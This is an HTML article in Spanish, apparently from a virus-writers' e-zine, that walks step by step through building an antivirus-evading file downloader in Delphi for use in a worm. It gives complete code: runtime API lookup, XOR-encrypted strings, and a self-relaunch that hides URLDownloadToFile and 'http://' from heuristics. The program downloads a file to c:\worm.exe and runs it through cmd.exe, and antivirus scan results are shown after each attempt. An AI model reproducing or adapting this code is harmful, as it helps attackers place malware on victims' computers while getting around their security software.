﻿
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.style68 {color: #FF0000}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.style78 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style86 {font-family: "Courier New", Courier, monospace}
.style92 {color: #FF0000; font-family: "Courier New", Courier, monospace; font-size: 12px; }


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Downloader indetectable</span><br>
    #Autor: <strong>Pana_Infierno[GEDZAC]</strong> <em>&lt;pana_infierno@gedzac.com&gt;</em></span><br>
    </p>
  </div>
  <div align="left">
    <p align="justify" class="style55">Hola a todos los seguidores de <strong>GEDZAC</strong>, bueno  todos en algun momento necesitamos bajar un archivo desde Internet ya sea para  un virus, worm o una aplicación normal, yo lo necesitaba para un worm y no pude  usar solo porque habian muchos antivirus que me detectaban la rutina esta api <em><strong>URLDownloadToFile</strong></em>, por eso cree una  rutina que me permite descargar un archivo de Internet pero sin ser detectado  por ningun antivirus.</p>
    <p align="justify" class="style55">Vamos a  escribir un pequeño fragmento de código en delphi declarando la función y la  escanearemos:</p>
    <p class="style78"><strong>program downloader_detectable;</strong></p>
    <p class="style78"><strong>   function URLDownloadToFile(Caller: cardinal; URL: PChar;</strong><br>
        <strong>                             FileName: PChar;  Reserved: LongWord;</strong><br>
        <strong>                             StatusCB:  cardinal): Longword; stdcall;</strong><br>
        <strong>                             external  'URLMON.DLL' name 'URLDownloadToFileA';</strong></p>
    <p class="style78"><strong>begin</strong></p>
    <p class="style55"><span class="style78"><strong>end.</strong></span></p>
    <p align="justify" class="style55"><br>
    Al hacer un escaneo con todos los antivirus se obtiene el siguiente resultado:</p>
    <table width="48%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="21%" class="style68"><p class="style55"><span class="style55 style68">CAT-QuickHeal</span></p></td>
        <td width="58%" class="style68"><p class="style55"><span class="style55 style68">Trojan.Agent.ipl </span></p></td>
      </tr>
      <tr>
        <td class="style68"><p class="style55">Fortinet</p></td>
        <td class="style68"><p class="style55"><span class="style55 style68">Win32/Dloader.BX!.tr </span></p></td>
      </tr>

      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">VBA32</span></td>
        <td class="style68"><span class="style55 style68 style86 style93"><span class="style55 style68">Trojan.Win32.Dloader.Bx</span></span></td>
      </tr>
    </table>
    <p align="justify" class="style55">Bueno tan  solo con declarar la función es detectada por algunos antivirus y eso no me  gusta ahora usare la función y escaneare nuevamente.</p>
    <p class="style78"><strong>program downloader_detectable;</strong></p>
    <p class="style78"><strong>   function URLDownloadToFile(Caller: cardinal; URL: PChar;</strong><br>
    <strong>                             FileName: PChar;  Reserved: LongWord;</strong><br>
    <strong>                             StatusCB: cardinal):  Longword; stdcall;</strong><br>
    <strong>                             external  'URLMON.DLL' name 'URLDownloadToFileA';</strong></p>
    <p class="style78"><strong>begin</strong><br>
    <strong> URLDownloadToFile(0,pchar('http://www.gedzac.com/nadia.jpg'),pchar('c:\worm.exe'),0,0);</strong></p>
    <p class="style78"><strong>end.</strong></p>
    <p align="justify" class="style55">Ahora mas  antivirus detectan la bendita función que tanto nos sirve, entonces hay que  solucionar esto.<br></p>
    <p class="style55 style68">&nbsp;</p>
    <table border="0" cellspacing="0" cellpadding="0" width="48%">
      <tr>
        <td width="27%" class="style68"><p class="style55">AntiVir</p></td>
        <td width="73%" class="style68"><p class="style55"><span class="style68">TR/Delphi.Downloader</span></p></td>
      </tr>
      <tr>
        <td class="style68"><p class="style55">Fortinet</p></td>
        <td class="style68"><p class="style55"><span class="style68">Suspicious</span></p></td>
      </tr>
      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">NOD32v2</span></td>
        <td class="style68"><span class="style55 style68 style86 style93">Probably unknown NewHeur_PE virus</span></td>
      </tr>
      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">Panda</span></td>
        <td class="style68"><span class="style55 style68 style86 style93">Suspicious</span></td>
      </tr>
      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">VBA32</span></td>
        <td class="style68"><span class="style55 style68 style86 style93">Suspecte Of Win32.Trojan.Downloader</span></td>
      </tr>
    </table>
    <p class="style55 style68">&nbsp;</p>
    <p align="justify" class="style55">No expondré  las pruebas que realice para lograr no ser detectado pero planteare los métodos:<br>
    1.-  encriptar cadenas<br>
    2.-  encriptar las funciones<br>
    3.- llamar  con otro método a la función contenida en la dll.</p>
    <p align="justify" class="style55">Bueno aca  va el código 100% funcional llegar y compilar.</p>
    <p class="style78"><strong>program download_indetectable;</strong></p>
    <p class="style78"><strong>var</strong><br>
    <strong> URLDownloadToFile_:pointer;</strong></p>
    <p class="style78"><strong>  type</strong><br>
    <strong>  FARPROC  = Pointer;</strong><br>
    <strong>  HINST =  type LongWord;</strong><br>
    <strong>  HMODULE  = HINST;</strong><br>
    <strong>  LPCSTR  = PAnsiChar;</strong></p>
    <p class="style78"><strong>function GetProcAddress(hModule: HMODULE;  lpProcName: LPCSTR): FARPROC; stdcall;</strong><br>
    <strong>external 'kernel32.dll' name 'GetProcAddress';</strong></p>
    <p class="style78"><strong>function LoadLibraryA(lpLibFileName:  PAnsiChar): HMODULE; stdcall;</strong><br>
    <strong> external  'kernel32.dll' name 'LoadLibraryA';</strong></p>
    <p class="style78"><strong>function CopyFile(lpExistingFileName,  lpNewFileName: PAnsiChar; bFailIfExists: longBool): LongBool; stdcall;</strong><br>
    <strong> external  'kernel32.dll' name 'CopyFileA';</strong></p>
    <p class="style78"><strong>function WinExec(lpCmdLine: LPCSTR; uCmdShow:  LongWord): LongWord; stdcall;</strong><br>
    <strong> external  'kernel32.dll' name 'WinExec';</strong></p>
    <p class="style78"><strong>function GetAPI(dll:string;api:string):pointer;</strong><br>
    <strong> var  handle:integer;</strong><br>
    <strong>      res:pointer;</strong><br>
    <strong>  begin</strong><br>
    <strong>   handle  := LoadLibraryA(pchar(dll));</strong><br>
    <strong>   res :=  GetProcAddress(Handle,Pchar(api));</strong><br>
    <strong>   result  := res;</strong><br>
    <strong> end;</strong></p>
    <p class="style78"><strong>function StrLen(const Str: PChar): Cardinal; assembler;</strong><br>
    <strong>asm</strong><br>
    <strong>         MOV     EDX,EDI</strong><br>
    <strong>         MOV     EDI,EAX</strong><br>
    <strong>         MOV     ECX,0FFFFFFFFH</strong><br>
    <strong>         XOR     AL,AL</strong><br>
    <strong>         REPNE   SCASB</strong><br>
    <strong>         MOV     EAX,0FFFFFFFEH</strong><br>
    <strong>         SUB     EAX,ECX</strong><br>
    <strong>         MOV     EDI,EDX</strong><br>
    <strong>end;</strong></p>
    <p class="style78"><strong>&nbsp;</strong></p>
    <p class="style78"><strong>Function E(Texto:string;Clave:integer):string;</strong><br>
    <strong>var</strong><br>
    <strong>     Nuevo:string;</strong><br>
    <strong>     Largo,I:Integer;</strong><br>
    <strong>begin</strong><br>
    <strong> Largo :=  strLen(PChar(Texto));</strong><br>
    <strong>  For i  := 1 to Largo do</strong><br>
    <strong>   begin</strong><br>
    <strong>    Nuevo  := Nuevo + chr(ord(Texto[i]) xor Clave);</strong><br>
    <strong>   end;</strong><br>
    <strong>    E :=  Nuevo;</strong><br>
    <strong>end;</strong></p>
    <p class="style78"><strong> procedure URLDownloadToFile(const url,archivo:string);</strong><br>
    <strong> var  a,b:pchar;</strong><br>
    <strong> begin</strong><br>
    <strong> a :=  Pchar(archivo);</strong><br>
    <strong> b :=  Pchar(url);</strong><br>
    <strong> asm</strong><br>
    <strong>  PUSH           0</strong><br>
    <strong>  PUSH           0</strong><br>
    <strong>  PUSH           a</strong><br>
    <strong>  PUSH           b</strong><br>
    <strong>  PUSH           0</strong><br>
    <strong>  Call  URLDownloadToFile_</strong><br>
    <strong> end;</strong><br>
    <strong> end;</strong></p>
    <p class="style78"><strong>begin</strong><br>
    <strong>URLDownloadToFile_ := GetApi('urlmon.dll','URLDownloadToFileA');</strong></p>
    <p class="style78"><strong>URLDownloadToFile('http://www.gedzac.com/nadia.jpg','c:\worm.exe');</strong></p>
    <p class="style78"><strong>end.</strong></p>
    <p align="justify" class="style55">Ahora lo  compilare y lo escaneare nuevamente:<br>
    :s algo  paso ahora hay 2 antivirus que me detectan algo, “virus total es una trampa  mortal”, este código antes de escanearlo ahí hace como un mes atrás era indetectable  100%</p>
    <table width="50%" border="0" cellpadding="0" cellspacing="0">

      <tr>
        <td width="17%" class="style68"><span class="style55 style68 style86 style93">NOD32v2</span></td>
        <td width="67%" class="style68"><span class="style55 style68 style86 style93">Probably unknown NewHeur_PE virus</span></td>
      </tr>

      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">VBA32</span></td>
        <td class="style68"><span class="style55 style68 style86 style93">Suspecte Of Win32.Trojan.Downloader</span></td>
      </tr>
    </table>
    <p align="justify" class="style55">Esta claro el problema estoy verificando…,  definitivamente ese par de antivirus que detectan el modulo, esta cadena de  texto http://,  el problema es que si saco esta cadena no puedo descargar el archivo.  Bueno mientas desarrollaba este artículo me encontré con el problema de arriba,  he probado varios métodos para eliminarlos pero me he encontrado con una gran  sorpresa, comente todas las líneas de código y compile el programa asi quedo:</p>
    <table width="40%" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td width="32%" class="style68"><span class="style55 style68 style86 style93">Fortines</span></td>
        <td width="68%" class="style68"><span class="style55 style68 style86 style93">Trojan.Agent.ipl</span></td>
      </tr>
      <tr>
        <td class="style68"><span class="style55 style68 style86 style93">VBA32</span></td>
        <td class="style68"><span class="style55 style68 style86 style93">Trojan Win32.Dloader.BX</span></td>
      </tr>
    </table>
    <p align="justify" class="style55">3 antivirus  me detectan el archivo como virus :s, asi que seguiré exponiendo lo anterior.</p>
    <p align="justify" class="style55">Después de  vario análisis he concluido en que los antivirus detectan estas cadenas ya estén  encriptadas o no:<br>
    urlmon.dll<br>
    URLDownloadToFileA<br>
    http://</p>
    <p align="justify" class="style55">bueno como  solucionamos esto si no hay forma aparente de saltarse esto porque siempre  detectara la cadena porque algunos antivirus lo hacen en tiempo de ejecución  una ves nuestro programa ya ha desencriptado las cadenas, la solución esta en  abrir nuestro mismo programa pasándole las cadenas que el antivirus detecta  como parámetros, usaremos esta fusión: paramstr(i)<br>
    asi que  cambiaremos esta parte del código </p>
    <p class="style78"><strong>begin</strong><br>
      <strong> URLDownloadToFile_  := GetApi('urlmon.dll','URLDownloadToFileA');</strong></p>
    <p class="style78"><strong> URLDownloadToFile('http://www.gedzac.com/nadia.jpg','c:\worm.exe');</strong></p>
    <p class="style78"><strong>end.</strong></p>
    <p class="style78">por esta  otra</p>
    <p class="style78"><strong>begin</strong></p>
    <p class="style78"><strong>//P1:=' urlmon.dll';</strong><br>
    <strong>//P2:=' URLDownloadToFileA';</strong><br>
    <strong>//P3:=' http://www.gedzac.com/nadia.jpg';</strong></p>
    <p class="style78"><strong>P1:=e('*xfged$nff',10);</strong><br>
    <strong>P2:=e('*_XFNe}dfekn^eLcfoK',10);</strong><br>
    <strong>P3:=e('*b~~z0%%}}}$monpki$ieg%dknck$`zm',10);</strong></p>
    <p class="style78"><strong>if (paramstr(1) &lt;&gt; '') or (paramstr(2)  &lt;&gt; '') or (paramstr(3) &lt;&gt; '') then</strong><br>
    <strong> begin</strong><br>
    <strong>   URLDownloadToFile_ := GetApi(paramstr(1),paramstr(2));</strong><br>
    <strong>   URLDownloadToFile(paramstr(3),'c:\worm.exe');</strong><br>
    <strong> end</strong><br>
    <strong>  else</strong><br>
    <strong>   begin</strong><br>
    <strong>     copyFile(pchar(paramstr(0)),pchar('c:\nuevo.exe'),true);</strong><br>
    <strong>     sleep(1000);</strong><br>
    <strong>     accion:='Cmd.exe /c c:\nuevo.exe '+ P1 + P2 + P3;</strong><br>
    <strong>     WinExec(pchar(accion),0);</strong><br>
    <strong>   end;</strong><br>
    <strong>end.</strong></p>
    <p class="style78"><span class="style66">Parámetro 1  = <strong>urlmon.dll</strong><br>
    Parámetro 2  = <strong>URLDownloadToFileA</strong><br>
    Parámetro 3  = <strong>http://www.gedzac.com/nadia.jpg</strong></span></p>
    <p class="style55">Despues de hacer esto ninguna heuristica de ningun antivirus detecto esto...:)</p>
    <p class="style55">Saludos espero que les sea de ayuda.</p>
</div>
    <div align="left" class="style55"></div>
</body>
</html>
